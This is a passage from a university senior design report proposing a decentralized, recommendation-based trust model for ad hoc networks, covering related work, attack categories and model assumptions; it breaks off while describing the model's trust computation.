59.33
Technical Support On-Line Manuals RL-ARM User's Guide (MDK v4) #include <rtl.h> int _init_box ( void* box_mem, /* Start address of the memory pool */ U32 box_size, /* Number of bytes in the memory pool */ U32 blk_size ); /* Number of bytes in each block of the pool */ The _init_box function initializes a fixed block size memory pool. When the memory pool is initialized, the RTX kernel handles memory requests by allocating a block of memory from the memory pool. The box_mem specifies the start address of the memory pool, and this address must be 4-byte aligned. The box_size argument specifies the size of the memory pool, in bytes. The blk_size argument specifies the size, in bytes, of the blocks in the memory pool. You can set the block size to any value from 1 to box_size-12. However, the blk_size is rounded up to the next multiple of 4 to maintain 4-byte address alignment of the blocks. For example if you initialize a memory pool for 10-byte blocks, the _init_box function actually initializes the memory pool for 12-byte blocks. The _init_box function is in the RL-RTX library. The prototype is defined in rtl.h. Note The _init_box function returns 0 if the memory pool was initialized without any problem. If there was an initialization error, it returns 1. _alloc_box, _calloc_box, _declare_box, _free.
http://www.keil.com/support/man/docs/rlarm/rlarm__init_box.htm
CC-MAIN-2020-05
refinedweb
225
64.41
Python - Delete all nodes of the Circular Doubly Linked List Deleting all nodes of a circular doubly linked list requires traverse through the list and deleting each node one by one. It requires creating a current node pointing to the next of head. Delete the current node and move to the next node using temp node. Repeat the process till the current node becomes head. At last, delete the head. The function deleteAllNodes is created for this purpose. It is a 3-step process. def deleteAllNodes(self): if self.head != None: #1. if head is not null create a temp node # and current node pointed to next of head current = self.head.next while(current != self.head): #2. if current node is not equal to head, delete the # current node and move current to next node using temp, # repeat the process till the current reaches the head temp = current.next current = None current = temp #3. Delete the head self.head = None print("All nodes are deleted successfully.") The below is a complete program that uses above discussed concept of deleting all nodes of a circular doubly linked list which makes the list empty with size zero. # node structure class Node: def __init__(self, data): self.data = data self.next = None self.prev = None #class Linked List class LinkedList: def __init__(self): self.head = None #Add new element at the end of the list def push_back(self, newElement): newNode = Node(newElement) if(self.head == None): self.head = newNode newNode.next = self.head newNode.prev = self.head return else: temp = self.head while(temp.next != self.head): temp = temp.next temp.next = newNode newNode.next = self.head newNode.prev = temp self.head.prev = newNode #delete all nodes of the list def deleteAllNodes(self): if self.head != None: current = self.head.next while(current != self.head): temp = current.next current = None current = temp self.head = None print("All nodes are deleted successfully.") () #delete all nodes of the list MyList.deleteAllNodes() #Display the content of the list. MyList.PrintList() The above code will give the following output: The list contains: 10 20 30 40 All nodes are deleted successfully. The list is empty.
https://www.alphacodingskills.com/python/ds/python-delete-all-nodes-of-the-circular-doubly-linked-list.php
CC-MAIN-2021-31
refinedweb
359
79.06
In this short tutorial I will guide you through some basic steps in order to create a Crystal Space application using the KDevelop IDE. First of all, you need to have a compiled and working version of Crystal Space, see "Building and Installing Crystal Space". Note: The screenshots embedded on this page are reduced versions. Click on them for the full resolution image. Now open KDevelop C/C++ IDE and click on Project -> New. A wizard appears and you should see a screen similar to this: Now, as shown in the screenshot, choose C++ and Simple Hello world program. In the properties area, enter your preferred application name and a location to store the source and additional files in. The path can be located anywhere you like and does not have to be in the Crystal Space source directory. Just make sure you have sufficient r/w permissions and drive space available. The next step of the wizard takes you to this screen: Here you can enter your name, e-mail and the version and license type of your application. In the next step you can optionally set up a version control system, which is useful for larger projects. I will not go into detail here, since this is not part of this tutorial: The next two screens show the templates for the .h and .cpp source files, you may want to keep the copyright stuff in there: So much for warm-up, lets get down to the nitty-gritty. A screen similar to the one below appears, now open the project properties page by clicking Project and Project Options: A new window pops up where you can configure several project-specific settings, you can take a look through them to make sure everything is in order. Click on Configure Options and enter a new configuration name, here it is CrystalSpace. Now, important is to click on 'Add' before actually entering anything in the below fields. Now you have created a new configuration profile and you can enter the Crystal-Space specific settings as shown:. Basically you can copy-paste (and if needed, edit) the following: And at the next tab (C tab): And at the C++ tab: In the 'run' options tab on the left hand side, you can enter some arguments to the program, e.g. '-mode=1280x1024 -fs' or '-bugplug' Now let's see if you're lucky. Click Build and Run automake & friends Before you can start, you have to insert the obligatory lines for Crystal-Space applications in your .cpp file: #include <crystalspace.h> (in the screenshot: <cssysdef.h> because of older version of Crystal Space) and CS_IMPLEMENT_APPLICATION. In addition you may need to modify the signature of the main function the following way: For testing purposes, you can try out the 'simple1.cpp' and 'simple1.h' source files from the Crystal Space code tree. These files can be found within the Crystal Space source code tree at the following location: 'CS/apps/tutorial/simple1' Now you should be able to compile your application and make some shiny game with Crystal Space! That's all there is to it. If you have trouble, you are welcome to check out the Crystal Space IRC-Channel for help or drop me a note. Written by Jan Hendriks (DaHoC, DaHoC3150 [@] gmail.com) Last major update 10.08.2007, Using KDevelop 3.4.1, Crystal Space 1.3, CEL 1.3 (both svn trunk version) Please report site bugs at the Bugtracker
http://www.crystalspace3d.org/mediawiki/index.php?title=KDevelop_tutorial&diff=3403&oldid=2608
CC-MAIN-2014-41
refinedweb
583
72.36
2.3. Automatic Differentiation¶ In machine learning, we train models, updating them successively so that they get better and better as they see more and more data. Usually, getting better means minimizing a loss function, a score that answers the question “how bad is our model?” With neural networks, we typically choose loss functions that are differentiable with respect to our parameters. Put simply, this means that for each of the model’s parameters, we can determine how much increasing or decreasing it might affect the loss. While the calculations for taking these derivatives are straightforward, requiring only some basic calculus, for complex models, working out the updates by hand can be a pain (and often error-prone). The autograd package expedites this work by automatically calculating derivatives. compute graph, filling in the partial derivatives with respect to each parameter. If you are unfamiliar with some of the math, e.g. gradients, please refer to the “Mathematical Basics” section in the appendix. In [1]: from mxnet import autograd, nd 2.3.1. A Simple Example¶ As a toy example, say that we are interested in differentiating the mapping \(y = 2\mathbf{x}^{\top}\mathbf{x}\) with respect to the column vector \(\mathbf{x}\). To start, let’s create the variable x and assign it an initial value. In [2]: x = nd.arange(4).reshape((4, 1)) print(x) [[0.] [1.] [2.] [3.]] <NDArray 4x1 @cpu(0)> Once we compute the gradient of y with respect to x, we will need a place to store it. We can tell an NDArray that we plan to store a gradient by invoking its attach_grad() method. In [3]: x.attach_grad() Now we are going to compute y and MXNet will generate a computation graph on the fly. It (e.g. when using neural techniques such as dropout and batch normalization). In other cases, some models may store more auxiliary variables to make computing gradients easier. We will cover these differences in detail in later chapters. For now, you do not need to worry about them. 2 then call the backward function to calculate.3.6. Exercises¶ - this paper by Edelman, Ostrovski and Schwartz, 2005. - Why is the second derivative much more expensive to compute than the first derivative? - Derive the head gradient relationship for the chain rule. If you get stuck, use the “Chain Rule” article on Wikipedia. - Assume \(f(x) = \sin(x)\). Plot \(f(x)\) and \(\frac{df(x)}{dx}\) on a graph, where you computed the latter without any symbolic calculations, i.e. without exploiting that \(f'(x) = \cos(x)\).
http://d2l.ai/chapter_crashcourse/autograd.html
CC-MAIN-2019-18
refinedweb
428
58.08
An introduction to testing with XCUITest User interface testing can be tricky to get right, so in this tutorial we’re going to take an app that has no UI tests and upgrade it so you can see exactly how the process work. The project we’ll be using is a simple sandbox with a variety of controls – you can download it here. Give the example app a try now – it’s a simple sandbox app with a small amount of functionality: This example gives us a variety of controls to work with, which should allow for some interesting UI tests. If you didn’t see the on-screen keyboard when the text field was selected, you should go to the Hardware menu and uncheck Keyboard > Connect Hardware Keyboard. XCUITest does not work great with hardware keyboards, so you should use the on-screen one to be sure. Note: This sandbox app is specifically about user interface testing. Where possible regular unit tests are preferable. UI testing is notoriously flaky, and ideally you should make most of your app independent of the user interface – if you can avoid using import UIKit that’s a good sign! Right now the app doesn’t have anywhere to add UI tests, so the first step is to add a new target. Go to the File menu and choose New > Target. You’ll see a long list of possible targets, but I’d like you to scroll down and select iOS UI Testing Bundle then click Next. Xcode’s default options might be OK, but check the team option to make it’s configured for your team. Finally, look inside the XCUITestSandboxUITests group and open XCUITestSandboxUITests.swift for editing. Like regular tests you’ll see setUp() and tearDown() methods that run before and after your tests to make sure they are in a consistent state. You’ll also see an empty test method to get us started, called testExample(). For now I want to focus on the setUp() method, which should contain code like this: //. That second comment is important: you need to make sure the app is configured in a very specific way, otherwise you’re likely to have tests fail sporadically. While you can put code after that comment to force your app to be in a specific state, most good tests I’ve seen use a much more robust approach: pass in a command-line parameter that the app can read and adapt to. To pass in a testing flag, replace the call to XCUIApplication().launch() with this: let app = XCUIApplication() app.launchArguments = ["enable-testing"] app.launch() That will pass “enable-testing” to the app when it’s launched, which we can then make it detect and respond to. Our sandbox app doesn’t have any initial state to worry about, but if you needed to configure your app in a certain way then you would add something like this to your main app: #if DEBUG if CommandLine.arguments.contains("enable-testing") { configureTestingState() } #endif What configureTestingState() does is down to you – you might load some preconfigured data, for example. Warning: If you’re shipping a macOS app that enables a testing mode using command-line flags, make sure you wrap your command-line arguments check using #if DEBUG otherwise real users can enable your testing mode. To start with, we’re going to use Xcode’s test recording system to write some code. Xcode watches what you do inside the simulator and translates your taps and swipes into Swift code – or at least tries to. Click inside the testExample() method, and you should see a red recording button become active directly below the code area – next to where the breakpoint and debugging buttons are. Go ahead and press that button now, and you should see Xcode build and launch your app. Here’s what I’d like you to do when the app launches: As you take those actions, code will be written directly into the testExample() method, more or less matching what you’re doing on-screen. I say “more or less” because in practice this is the flakiest part of XCTest: it generates terrible code that often won’t compile. Here’s the code it generated for me when I followed the above actions: let app = app2 app.otherElements.containing(.navigationBar, identifier: "Alpha").children(matching: .other).element.children(matching: .other).element.children(matching: .other).element.children(matching: .other).element.children(matching: .textField).element.tap() let tKey = app.keys["t"] tKey.tap() tKey.tap() let tKey = app.keys["e"] eKey.tap() eKey.tap() let sKey = app.keys["s"] sKey.tap() sKey.tap() tKey.tap() tKey.tap() let app2 = app app2.buttons["Return"].tap() app.sliders["50%"].swipeRight() app2.buttons["Omega"].tap() app.buttons["Blue"].tap() app.alerts["Blue"].buttons["OK"].tap() Wherever you see some code with a blue background color, click the micro-sized arrow to the right of it to see other possible interpretations of that code. That code has a number of problems: let app = app2, is meaningless because app2isn’t defined. .element.children(matching: .other)repeatedly for no real reason. sliders["50%"]– that’s its value, which means it will change. swipeRight(), rather than a precise movement to a value. Not only is this code so bad that it won’t compile, but it’s so bad it actually crashed my Swift compiler – see SR-7517. This code doesn’t actually test anything yet, but before we can write tests we need to make it work. So, please change it to this: func testExample() { let app = XCUIApplication() app.textFields.element.tap() app.keys["t"].tap() app.keys["e"].tap() app.keys["s"].tap() app.keys["t"].tap() app.keyboards.buttons["Return"].tap() app.sliders["50%"].swipeRight() app.segmentedControls.buttons["Omega"].tap() app.buttons["Blue"].tap() app.alerts["Blue"].buttons["OK"].tap() } That does all the work we want, but it’s significantly less code, and for bonus points actually compiles. Note: In case you were unfamiliar, XCTest expects all test cases to start with the word “test” and return nothing. XCUITest is built around the concept of queries: you navigate through your UI using calls that get evaluated at runtime. You can navigate in a variety of ways, which is why both app.buttons["Omega"].tap() and app.segmentedControls.buttons["Omega"].tap() are valid – as long as XCUITest finds a button with the title “Omega” somewhere then it’s happy. If you noticed, there are two ways of accessing a specific element: app.textFields.element.tap() app.buttons["Blue"].tap() The first option is used when the query – textFields – only matches one item. If our app had only one button, we could have used app.buttons.element.tap() to tap it. The second option is used when you need to select a specific item. Using app.buttons["Blue"] effectively means “the button that has the title ‘Blue’”, but this approach is problematic as can be seen here: app.sliders["50%"].swipeRight() Sliders don’t have titles, so Xcode identified it using its value. This was 50% to begin with, but that’s a really confusing way to refer to user interface elements, so iOS gives us a better solution called accessibility identifiers. All UIKit interface objects can be given these text strings to identify them uniquely for user interface testing. To try this out, open Main.storyboard and select the slider. Select the identity inspector, then enter “Completion” for its accessibility identifier. Note: The accessibility identifier is designed for internal use only, unlike the other two accessibility text fields that are read to the user when Voiceover is activated. With that change we can refer to our slider regardless of what value it might have, like this: app.sliders["Completion"].swipeRight() So far we’ve used Xcode’s event recorder, cleaned up the code it generated, and added an accessibility identifier to avoid problems when accessing the slider. However, we still don’t have any tests, so let’s write those now. Take a copy of the testExample() method and call it testLabelCopiesTextField(), like this: func testLabelCopiesTextField() { let app = XCUIApplication() app.textFields.element.tap() app.keys["t"].tap() app.keys["e"].tap() app.keys["s"].tap() app.keys["t"].tap() app.keyboards.buttons["Return"].tap() app.sliders["Completion"].swipeRight() app.segmentedControls.buttons["Omega"].tap() app.buttons["Blue"].tap() app.alerts["Blue"].buttons["OK"].tap() } Now delete its last four lines, but make some space where we can write a test: func testLabelCopiesTextField() { let app = XCUIApplication() app.textFields.element.tap() app.keys["t"].tap() app.keys["e"].tap() app.keys["s"].tap() app.keys["t"].tap() app.keyboards.buttons["Return"].tap() // test goes here } As for the test itself, this uses the same XCTAssert() functions you should already be using with unit tests. For example, XCTAssertTrue() will consider your test to have passed if its condition is true. In this case we want to check whether the label contains the text “test”, which is done like this: XCTAssertTrue(app.staticTexts.element.label == "test") Put that directly below the // test goes here comment. You might be wondering why we must use staticTexts rather than labels, but keep in mind XCUITest is cross-platform – AppKit on macOS blurs the lines between text fields and labels, so using something generic like “staticTexts” makes sense on both platforms. You can try that test now if you want – if you press Cmd+B to build your code you should see an empty gray diamond to the left of func testLabelCopiesTextField(), and clicking that will run the test. Next we’re going to test the slider and progress view, because moving the slider to the right should move the progress view to the left. Copy the app.sliders["Completion"].swipeRight() line into its own test called testSliderControlsProgress(), like this: func testSliderControlsProgress() { app.sliders["Completion"].swipeRight() } You’ll need to copy the definition for app too, making this: func testSliderControlsProgress() { let app = XCUIApplication() app.sliders["Completion"].swipeRight() } The swipeRight() method call was generated by Xcode, but it’s really not fit for purpose here because it doesn’t mention how far the test should swipe. To fix this we need to replace swipeRight() with a call to adjust(toNormalizedSliderPosition:). As the name suggests, this takes normalized slider positions, meaning that you refer to the leading edge as 0 and the trailing edge as 1 even if your slider counts from 0 to 100. Here’s how that looks in code: func testSliderControlsProgress() { let app = XCUIApplication() app.sliders["Completion"].adjust(toNormalizedSliderPosition: 1) } Now for the complicated part: writing a test. This is complicated by three things: progressViewsproperty inside app. Instead, you must use progressIndicators. Any?– anything at all, or perhaps nothing. Any?to a string, and if that fails for some reason we’ll call XCTFail()then end the test. Here’s how the test should look: func testSliderControlsProgress() { let app = XCUIApplication() app.sliders["Completion"].adjust(toNormalizedSliderPosition: 1) guard let completion = app.progressIndicators.element.value as? String else { XCTFail() return } XCTAssertTrue(completion == "0%") } For our last test we’re going to make sure that tapping colors shows an alert. Start by copying app.buttons["Blue"].tap() and app.alerts["Blue"].buttons["OK"].tap() into their own testButtonsShowAlerts() test, then app the usual let app = XCUIApplication() line to the top. It should look like this: func testButtonsShowAlerts() { let app = XCUIApplication() app.buttons["Blue"].tap() app.alerts["Blue"].buttons["OK"].tap() } Between the second and third lines of that method we need to write a new test: does an alert exist with the title “Blue”? XCUITest has a dedicated exists property for this purpose, so we can test for the alert in just one line of code: func testButtonsShowAlerts() { let app = XCUIApplication() app.buttons["Blue"].tap() XCTAssertTrue(app.alerts["Blue"].exists) app.alerts["Blue"].buttons["OK"].tap() } At this point we’ve refactored all the code from testExample() into individual tests, so you can delete testExample() entirely. That’s all our code tested, so we can now run all the tests at the same time. To make that happen, scroll up to the top of XCUITestSandboxUITests and click to the left of class XCUITestSandboxUITests – it might be a green checkmark or a red cross depending on what state your tests are in. As Xcode runs all the tests you’ll see it start and stop the app multiple times, ensuring that your code runs from a clean state each time. If everything has gone to plan, once the test runs finish you should see a green checkmark next to your class – everything passed. Good job! If you'd like to learn more about Xcode UI testing, you should read my Xcode UI Testing Cheat Sheet – it's full of solutions to common real-world problems..
https://www.hackingwithswift.com/articles/83/how-to-test-your-user-interface-using-xcode
CC-MAIN-2019-47
refinedweb
2,128
53.61
ELECTRICAL AND COMPUTER ENGINEERING Senior Design Project II 0402492 TRUST MODEL FOR AD HOC NETWORKS Spring 2008/2009 By: • Osama Khaled Al-Koky (20510076) • Waleed S. Hammad (20510327) Supervisor: • Dr. Ibrahim Kamel 1 Trust Model in Ad hoc Networks Abstract Ad Hoc Networks’ fast growing popularity urged the research into countering the security concerns arisen from malicious nodes taking part in the construction of a trusted network. This project highlights some of the efforts that have been done to achieve trustful ad-hoc network. Then, the project illustrates how its proposed model is different from the related work. The project proposes a collaboration model that utilizes past interactions to identify malicious peers in ad-hoc networks. Peers might seek recommendations about an unknown node from other trusted peers before they decide to collaborate with them. The model takes into account oscillating peers which exhibit honest behavior for a period of time and then later become malicious. Also, in this project, we simulate the proposed model and conduct several experiments in verification of the model’s robustness. 2 Table of Contents Table of Figures 4 Equations 5 Table of Acronyms and Symbols 1. Introduction 6 1.1. Purpose and Motivation 1.2. Ad hoc Network 7 1.3. Centralized vs. Decentralized Trust 8 2. Problem definition 2.1. Scope 2.2. Attacks in ad-hoc networks 3. Related Work 10 3.1. Centralized Trust 3.2. Decentralized Trust 12 4. Model and Assumptions 14 4.1. Collaboration Model 4.2. Attack Model 15 4.3. Details of the Proposed Model 4.4. Bootstrapping 19 4.5. Redemption 5. Performance measures 5.1.1. Percentage of risky interactions 5.1.2. The speed of detecting a malicious node 20 6. Experiments 6.1. Assumptions and Relaxations 6.2. Simulation Scheme 6.3. Defenseless vs. fortified 21 6.4. Speed of detecting a malicious node 22 6.4.1. Speed of detecting a non-cooperating malicious node 6.4.2. Speed of detecting a cooperating malicious node 23 6.5. Speed of detecting a malicious oscillating node 24 6.5.1. Speed of recovering an honest oscillating node 25 6.5.2. IDS error rate vs. number of risky interactions 26 6.5.3. Weight of second hand experience vs. percentage of risky interactions .27 7. Conclusion 28 3 References 30 Appendix I: Simulator code 32 Class ToT node 33 network 39 Main 50 Table of Figures Figure 1: Collaboration between different devices in a public place Figure 2: Use of Ad-hoc networks in disasters recovery Figure 3: Categorization of trust models Figure 4: Table of Trust 16 Figure 5: Collaboration flow diagram Figure 6 Defenseless vs. fortified Figure 7: Speed of detecting a malicious node Figure 8 Speed of detecting a collaborating malicious node Figure 9 Speed of detecting an oscillating malicious node Figure 10 Speed of recovering an honest oscillating node Figure 11 IDS error rate vs. percentage of risky interactions 27 Figure 12 Weight of second hand experience vs. percentage of risky interactions Table of Equations Equation (1) 17 (2) 18 (3) PIE Past Interactions Experience T acc Trust Acceptable IDS Intrusion Detection System Table of Trust α Weight of Second Hand Experience δ Initialization Distance 1. Introduction 1.1. Purpose and Motivation People in public places such as airports and train stations can share resources among each other, using their portable PCs, PDAs or any portable or stationary communication device in the area. For example a person with a mobile phone that has no internet access could ask for the information from another person whose PDA has internet coverage, or a person with a PDA needing an operation that requires heavy processing power, (e.g. video editing or heavy image editing) can ask another person using a laptop to carry on the operation (see Figure 1). This type of environment is called an ad-hoc network - a brief description of this is in the following section. The problem arising with an ad-hoc network is that it brought up the need to deal with strangers or anonymous people in open public places with the absence of central systems that can govern those interactions. This may result in privacy breeches or may infect systems with viruses. Still, the ease of forming a network under ad-hoc networks makes it a popular method for interacting with others, thus urging research to provide better methods to make ad-hoc networks a safe communication environment. 1.2. Ad hoc Network An ad-hoc (or "spontaneous") network is a local area network such as small networks, especially one with wireless or temporary plug-in connections, in which some of the network devices are part of the network only for the duration of a communication's session or, in the case of mobile or portable devices, while in some close proximity to the rest of the network. In Latin, ad hoc literally means "for this", a further meaning is "for this purpose only" and thus usually temporary [1]. The network is created, operated and managed by the nodes themselves, without the use of any existing network infrastructure or centralized administration. The nodes assist each other by passing data and control packets from one node to another, often beyond the wireless range of the original sender. This union of nodes forms arbitrary topology. The nodes are free to move randomly and organize themselves arbitrarily; thus, the network's wireless topology may change rapidly and unpredictably. The decentralized nature of wireless ad hoc networks makes them suitable for a variety of applications where central nodes cannot be relied on, and may improve the scalability of networks compared to wireless managed networks. Such a network may operate in a standalone fashion, or may be connected to the larger Internet. Minimal configuration and quick deployment make ad hoc networks suitable for emergency situations like disasters recovery (see Figure 2) or military conflicts. The execution and survival of an ad-hoc network is highly dependent upon the cooperative and trusting nature of its nodes. 1.3. Centralized vs. Decentralized Trust In centralized trust we need a party that is trusted by all nodes in the network and this party is responsible for calculating the trust for each and every node in the network. Systems like eBay and Amazon can use a centralized trust authority since users are stationary and they have a fixed account. This scheme has some disadvantages. First, there is only a single authority which its failure means the failure of the whole system. Second, trust is something relative which means that the trust of a certain node may differ from one node to another, and since ad-hoc network are established on the fly, it is difficult to create a centralized authority. In decentralized trust, on the other hand, nodes themselves have to organize the network and each node will compute the trust of its neighbors by monitoring their behaviors and taking recommendations from other nodes that have experience with the node we are seeking collaborating with. In ad-hoc networks nodes do not necessarily have to know each other, so they cannot know whether they are collaborating with a legitimate node or a malicious one. This leads to the need of a trust model to organize the network without having a centralized unit. 2.1. Scope In our model, the main concern is to provide trustful community that can find and eliminate malicious nodes. We also focus the efforts on the level of services provided by or required by the node rather than forwarding or receiving packets. Thus, our model is not considering attacks on routing and network layer, but rather attacks on the services level. 2.2. Attacks in ad-hoc networks There are a wide variety of attacks that target the weakness of ad-hoc network. The attacks in ad-hoc network can possibly be classified into two major categories according to the means of attack: Passive attacks and Active attacks. A passive attack obtains data exchanged in the network without disrupting the operation of the communications, while an active attack involves information interruption, modification, or fabrication. 9 Examples of passive attacks include eavesdropping, traffic analysis, and traffic monitoring. Examples of active attacks consist of jamming, impersonating, modification, denial of service (DoS), and message replay [13]. Attacks in networks can also be either external attacks and/or internal attacks. External attacks are carried out by nodes that do not belong to the domain of the network. Internal attacks are from compromised nodes, which are actually part of the network. Internal attacks are more severe when compared with outside attacks since the insider knows valuable and secret information, and possesses privileged access rights. More sophisticated and subtle attacks have been identified in recent research papers. The black hole, Byzantine, and wormhole [14] attacks are the typical examples. But those types of attacks are targeting the network layer, and thus routing, which is not the scope of our trust model. Rather, attacks on application layer are the sort of attacks concerning our model. The application layer communication is vulnerable in terms of security compared with other layers. The application layer contains user data, and it normally supports many protocols such as HTTP, SMTP, TELNET, and FTP, which provide many vulnerabilities and access points for attackers [13]. The application layer attacks are attractive to attackers because the information sought ultimately resides within the application and it is direct for them to make an impact and reach their goals. There are mainly two types of attacks on the application layer: Malicious code attack and Repudiation attacks. Malicious codes, such as viruses, worms, spywares and Trojan Horses, can attack both operating systems and user applications. The malicious programs usually can spread themselves through the network and cause the computer systems and the network to slow down or even be damaged. In the network layer, firewalls can be installed to keep packets in or keep packets out. In the transport layer, entire connections can be encrypted, end-to-end. But these solutions do not solve the authentication or non-repudiation problems in the application layer. Repudiation refers to a denial of participation in all or part of the communication. For example, a selfish node could deny conducting an operation on a credit card purchase, or deny any on-line bank transaction, which is the proToTypical repudiation attack on a commercial system [13]. A lot of researches have been carried out in the field of network trust. These researches can be categorized based on network topology or on implementation of the trust. Based on the network topology, there are trust for peer-to-peer networks and trust for ad hoc networks. Several papers have been published in P2P trust [11] [12]. However, these models have high overhead which is not suitable for ad-hoc network since mobile devices have limited energy and low processing capabilities. Based on the implementation of trust, we can categorize trust models as centralized and decentralized models which is what we are going to focus on in our project. A detailed discussion about centralized and decentralized trust is in the following sections. 3.1. Centralized Trust In centralized trust we need a party that is trusted by all nodes in the network and this party is responsible for calculating the trust for each and every node in the network. Systems like eBay and Amazon are using centralized trust authorities since users are stationary and they have fixed accounts. In eBay after each interaction the user gives a value for the satisfaction of the interaction (1) for positive, (-1) for negative and (0) for neutral. When deciding whether to interact with a certain user or not has to decided by a human. This also makes the system not fully automated since there is a human intervention in making a decision based on the reputation of a user. This scheme has some other disadvantages as well. 11 First, there is only a single authority which suffers from a single point of failure. This might not be severe in Internet environment but it is more severe in ad-hoc network where nodes can be highly mobile and connect and disconnect from the network more frequently. Another problem of the centralized trust model is that there will be a global trust value for each single node. However trust is usually subjective [5] that is A may have a trust value for C that is different from that of B. For example a malicious user A may not be interested in attacking a normal user B which means that B will have a high trust value for A. On the other hand A might be interested in attacking user C (e.g. a bank, financial institute etc.) which means that C will have a low trust value for A. In ad-hoc networks, on the other hand, nodes themselves have to organize the network and each node will compute the trust of its neighbors by monitoring their behaviors and taking recommendations from other nodes that have experience with the node we are seeking collaborating with. Centralized trust models are difficult to be applied in ad-hoc networks since the luxury of having centralized unit is very difficult to achieve. Trust models can also be categorized based on the application or network topology. There are three main categories which are: internet applications, peer-to-peer and ad hoc networks. Peer-to-peer networks are very similar to Ad-hoc networks in that both are self- organized and decentralized. Most peer-to-peer systems work on the wired internet [6], which makes the topology somehow known. Since nodes are connected to the internet most of them are static and have somehow unlimited power and processing capabilities which makes a heavy trust model feasible. In peer-to-peer we can assume the existence of some pretrusted nodes that are trusted by most peers in the network. We can even have a central authority to keep users’ profiles and manage the trust since everything is on the known internet. A good example of internet applications is web services. Trust in web services could be either from the point of view of the web service itself or from the point of view of the user of this service. Web services can evaluate users’ trust based on their profiles and their behavior. They also use a third party central authority for trust management. This model cannot be applied to ad hoc networks because of the use of user profiles. The dynamic nature of ad-hoc network makes keeping user profiles difficult since users can be part of several networks and the profile of each node need to be stored at every other node in the network due to absence of a centralized unit. Users can trust web services using any authentication techniques like the X.509 [1]. 3.2. Decentralized Trust Pretty Good Privacy (PGP) encryption uses public-key cryptography and includes a system which binds the public keys to a user name and/or an e-mail address. It was generally known as a web of trust to contrast with the X.509 system [3]. It became a popular trust system replacement for centralized trust. However, for access restricted ad-hoc networks, it had been shown to be unsuitable for the following reasons: • Assume sufficient density of certificate graphs o Problem at network initialization. Time delay to setup. • Certificate chains provide weak authentication: One or more compromised nodes in certificate chain can lead to unsuccessful authentication [15]. The EigenTrust [6] mechanism aggregates trust information from peers by having them perform a distributed calculation approaching the eigenvector of the trust matrix over the peers. EigenTrust relies on good choice of some pretrusted peers, which are supposed to be trusted by all peers. This assumption may be over optimistic in a distributed computing environment. The reason is that pretrust peers may not last forever. Once they score badly after some transactions, the EigenTrust system may not work reliably. Prakash V. and Vikram L. [7] made a collaborative trust model for secure routing. Their model is based on monitoring neighbor nodes for routing actions and issuing a single intrusion detection (SID) in case of observing a malicious action. Routing behaviors that are monitored to detect a malicious behavior are: • SIDS issued against a node. • The difference between the number of beacons a node is expected to send and the number of beacons it actually sends. • The difference between the number of acknowledgement a node is expected to send and the actual number of acknowledgement it sends. 13 The monitoring mechanism is the one used in SCAN [8], which monitors the routing updates and the packet forwarding behaviors of neighbor nodes. When a node observes a malicious activity from one of its neighbors it issues an SID against it. However, other nodes will not accept the SID blindly; instead it will check the trust of the node that issued the SID, request recommendations from other nodes as well and if the compromised node is in the radio range it will monitor it for a period and the decide whether to accept the SID or not. When a node wants to calculate the trust for a remote neighbor, the node requests the trust value from its neighbors who are in the range of that node. The node then calculates the bad trust value as a weighted average then it computes the route as a shortest path problem based on the trust values of the nodes. The shortcomings of this model are that they did not address the problem of the oscillating nodes and the processing and memory overhead of the model are very high. In TOMS [5], Y. Ren and A. Boukerche established a trust management system that allows only trustworthy intermediate nodes to participate in the path construction process while also providing anonymity to the communicating parties. The trust model is distributed to each node in the network and all nodes update their own assessments concerning other nodes accordingly. The routes set up in this way will traverse the most trustworthy nodes in each hop. The multicast mechanism used among nodes utilizes the trust as a requirement in order to choose the most satisfactory neighbors for conveying messages. The main factors in calculating the trust of a node in this model is the time this node spends in the community and the past activity record of the node. In most trust computation models, the trust value is computed generally based on the linear function. However, in TOMS they propose a trust model that will update the trust value based on different increase-shapes. The mentioned above related work is concerned with how to implement trust through routing related algorithms. And this is where our model comes with different scope in mind; to secure the services on the node from being under attack by malicious nodes. The PowerTrust [9] system dynamically selects small number of power nodes that are most reputable using a distributed ranking mechanism. In this model, peer feedbacks are following a power-law distribution. By using a look-ahead random walk strategy and leveraging the power nodes, PowerTrust significantly improves in global reputation accuracy and aggregation speed. PowerTrust is adaptable to dynamics in peer joining and leaving and robust to disturbance by malicious peers. The previous models suffer from several shortcomings which makes them either weak or more suitable for peer-to-peer networks rather than ad-hoc networks. The shortcomings of these models can be summarized in the following points. They assume the existence of some pretrusted nodes which means that they have a silent assumption that the network exists and it is running for some time. Also, they did not address the issue of bootstrapping the network which is very crucial. Our proposed model is different than previous models in several points. First, we will implement our model on the application layer, that is, we care only about attacks on this layer. Second, we assume that there is no network running and we do not rely on pretrusted nodes and we will consider the issue of bootstrapping the network. Finally, our biggest contribution is that we will take care of nodes that exhibit oscillating behavior. Oscillating node issue can be very dangerous for the network. For example a malicious node can join the network and behave honestly for a certain period of time until it gains high trust value from most of the nodes and then it starts issuing attacks. Another scenario is of an honest node being compromised by a malicious node or software. This will make its trust go down until no one interacts with it anymore. Nevertheless, the node can recover, but due to its trust being so low, the other nodes will still deny future interactions. This brings the need for a mechanism to deal with oscillating nodes efficiently. Our model is based on the past interactions between nodes and the recommendations taken from neighbor nodes. We are not considering routing, however, we are considering using the model for any type of interactions. 4.1. Collaboration Model We are considering wireless ad hoc network which consists of an unconstrained number of nodes. Nodes can be mobile phones, PCs, PDAs or any other portable communication device. Nodes can join and leave the network at any point of time and they can be stationary or mobile nodes. We assume that each node has a unique MAC address that cannot be altered. The network also might have an unconstrained number of malicious nodes. A node may ask a neighbor node for a certain service such as using the internet, shared printer, computing power, routing a packet to a certain destination, or any other distributed service. We will consider the existence of a protection system in the nodes of the network which can be an antivirus, an IDS or other protection and detection software. We will model this protection system as a probabilistic value which means that the system will detect a malicious activity in a certain probability. 4.2. Attack Model In this work we are considering attacks only on the application and transport layer. We are not concerned with attacks on the network layer (routing attacks). Nodes are divided into several categories according to their behavior. Selfish nodes are nodes which are not willing to collaborate with others nodes. Careless nodes are nodes which give random recommendation instead of the true ones. Malicious nodes are nodes which might attack other nodes and cause damage. Oscillating nodes are nodes which have oscillating behavior. for example behaving well for some time to gain high trust and then start attacking, or a trusted node which is being hacked or compromised by a virus or a malicious node. Trusted nodes are nodes which behave exactly as others expect them to behave. The most important of all are the malicious nodes and the oscillating nodes because they are the most dangerous ones. In our model we have several activities that we consider as attacks: • Sending a malicious code to a node asking for collaboration. • Overusing the collaborating node’s resources. • Usage of an unauthorized resource from the collaborating node. • Privacy breech or compromising the collaborating node’s privacy. 4.3. Details of the Proposed Model This section describes the proposed trust model and provides the metrics for assessing the trust in the network. The trust value computation is based on peer recommendations and past interactions experience. Past interaction experience is an aggregate 